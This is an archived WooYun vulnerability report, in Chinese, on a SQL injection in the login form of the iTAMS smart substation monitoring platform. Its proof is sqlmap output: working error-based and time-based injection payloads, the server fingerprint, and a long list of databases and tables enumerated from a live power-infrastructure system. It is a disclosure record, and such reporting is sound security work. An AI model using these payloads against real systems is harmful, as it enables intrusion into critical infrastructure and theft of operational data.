当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099542

漏洞标题:某智能变电站监控系统sql注射

相关厂商:cncert国家互联网应急中心

漏洞作者: YY-2012

提交时间:2015-03-05 13:16

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商已经确认,细节仅向厂商公开
2015-03-20: 细节向核心白帽子及相关领域专家公开
2015-03-30: 细节向普通白帽子公开
2015-04-09: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

rt

详细说明:

iTAMS智能变电站监控平台
http://itams.com.cn/
登录框txtUserName存在post注入。

aaaaaaaaaaaa2222222222222.jpg

漏洞证明:

sqlmap identified the following injection points with a total of 255 HTTP(s) requests:
---
Parameter: txtUserName (POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND EXTRACTVALUE(6496,CONCAT(0x5c,0x71767a7171,(SELECT (CASE WHEN (6496=6496) THEN 1 ELSE 0 END)),0x716b706b71)) AND 'fHDd'='fHDd&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND 8737=BENCHMARK(5000000,MD5(0x50494841)) AND 'tWfU'='tWfU&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtUserName (POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND EXTRACTVALUE(6496,CONCAT(0x5c,0x71767a7171,(SELECT (CASE WHEN (6496=6496) THEN 1 ELSE 0 END)),0x716b706b71)) AND 'fHDd'='fHDd&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND 8737=BENCHMARK(5000000,MD5(0x50494841)) AND 'tWfU'='tWfU&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.1
Database: tlms
[31 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: beijing
[33 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| videoequip |
| videorel |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: 11ta
[33 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| videoequip |
| videorel |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: wuhantlms
[33 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| videoequip |
| videorel |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: performance_schema
[46 tables]
+----------------------------+
| accounts |
| cond_instances |
| events_stages_current |
| events_stages_history |
| events_stages_history_long |
| events_stages_summary_by_a |
| events_stages_summary_by_h |
| events_stages_summary_by_t |
| events_stages_summary_by_u |
| events_stages_summary_glob |
| events_statements_currentq |
| events_statements_history_ |
| events_statements_historyq |
| events_statements_summary_ |
| events_waits_current |
| events_waits_history |
| events_waits_history_longq |
| events_waits_summary_by_ac |
| events_waits_summary_by_ho |
| events_waits_summary_by_in |
| events_waits_summary_by_th |
| events_waits_summary_by_us |
| events_waits_summary_globa |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| host_cache |
| hosts |
| mutex_instances |
| objects_summary_global_by_ |
| performance_timers |
| rwlock_instances |
| session_account_connect_at |
| session_connect_attrs |
| setup_actors |
| setup_consumers |
| setup_instruments |
| setup_objects |
| setup_timers |
| socket_instances |
| socket_summary_by_event_na |
| socket_summary_by_instance |
| table_io_waits_summary_by_ |
| table_lock_waits_summary_b |
| threads |
| users |
+----------------------------+
Database: tlms-beijing
[31 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: mysql
[41 tables]
+----------------------------+
| user |
| akbstf |
| columns_priv |
| db |
| ekdbqk |
| event |
| fikkag |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| innodb_index_stats |
| innodb_table_stats |
| iwwoig |
| kxtsom |
| ndb_binlog_index |
| oaigce |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| pvsouh |
| servers |
| sjbwda |
| slave_master_info |
| slave_relay_log_info |
| slave_worker_info |
| slow_log |
| tables_priv |
| tempmix4 |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_typeq |
| vaaxvz |
| vricta |
| vuecev |
| xrnliz |
+----------------------------+
Database: tlms-test
[31 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: itams1.3
[42 tables]
+----------------------------+
| cfgequipment |
| cfghouse |
| cfgport |
| cfgrfidreader |
| cfgrfidtag |
| cfgsamplerunit |
| cfgsignal |
| cfgstation |
| cfgstreamsrv |
| cfgvideo |
| cfgvideorel |
| cfgvideosrv |
| cfgworkstation |
| clerktype |
| controlqueue |
| doorctlunitevents |
| doorctlunitoperate |
| hisalarmdata |
| hiscontrolqueue |
| hisdata |
| manaclerk |
| manaoperaterecord |
| manaservice |
| manaset |
| oscondctrl |
| osdevstatecond |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| osuserpower |
| osvideo |
| rfidrecd |
| runalarmmsge |
| stationworkers |
| stdclass |
| stdcondition |
| stdmsge |
| stdpart |
| stdsampler |
| stdtype |
| workersdoorcard |
+----------------------------+
Database: sh
[33 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| videoequip |
| videorel |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: shanghai
[31 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: sakila
[23 tables]
+----------------------------+
| language |
| actor |
| actor_info |
| address |
| category |
| city |
| country |
| customer |
| customer_list |
| film |
| film_actor |
| film_category |
| film_list |
| film_text |
| inventory |
| nicer_but_slower_film_list |
| payment |
| rental |
| sales_by_film_category |
| sales_by_store |
| staff |
| staff_list |
| store |
+----------------------------+
Database: information_schema
[59 tables]
+----------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_AP |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_METRICS |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_DATAFILES |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESPACES |
| INNODB_SYS_TABLESTATS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| OPTIMIZER_TRACE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------+
Database: 1.1
[33 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| videoequip |
| videorel |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: world
[3 tables]
+----------------------------+
| city |
| country |
| countrylanguage |
+----------------------------+
Database: hndnms
[54 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hd_device_cam |
| hd_device_group |
| hd_device_group_detail |
| hd_device_ioport |
| hd_device_route |
| hd_log_alarm |
| hd_log_event |
| hd_log_sys |
| hd_log_upgrade |
| hd_map |
| hd_map_element |
| hd_ptz_cruise |
| hd_ptz_preset |
| hd_r_role |
| hd_r_user |
| hd_res_depart |
| hd_res_device |
| hd_res_right |
| hd_res_server |
| hd_res_type |
| hd_strategy_info |
| hd_vendor |
| hd_vendor_product |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| weatherdata |
| windageyawdata |
+----------------------------+
Database: shanghai-tlms
[33 tables]
+----------------------------+
| alarmevents |
| cameradata |
| curcameradata |
| curswaypathdata |
| curvibrationcurvedata |
| dirtinessdata |
| equipmentstate |
| hisalarmevents |
| hisequipmentstate |
| icingdata |
| lmequip |
| lmgroup |
| lmline |
| lmsignal |
| lmtype |
| ltemperaturedata |
| manaoperaterecord |
| oslevel |
| ospicture |
| ossignal |
| ostype |
| runsigdata |
| sagdata |
| swaydata |
| swaypathdata |
| towerleandata |
| userinfo |
| vibrationcurvedata |
| vibrationdata |
| videoequip |
| videorel |
| weatherdata |
| windageyawdata |
+----------------------------+

修复方案:

联系厂商

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-10 13:08

厂商回复:

最新状态:

暂无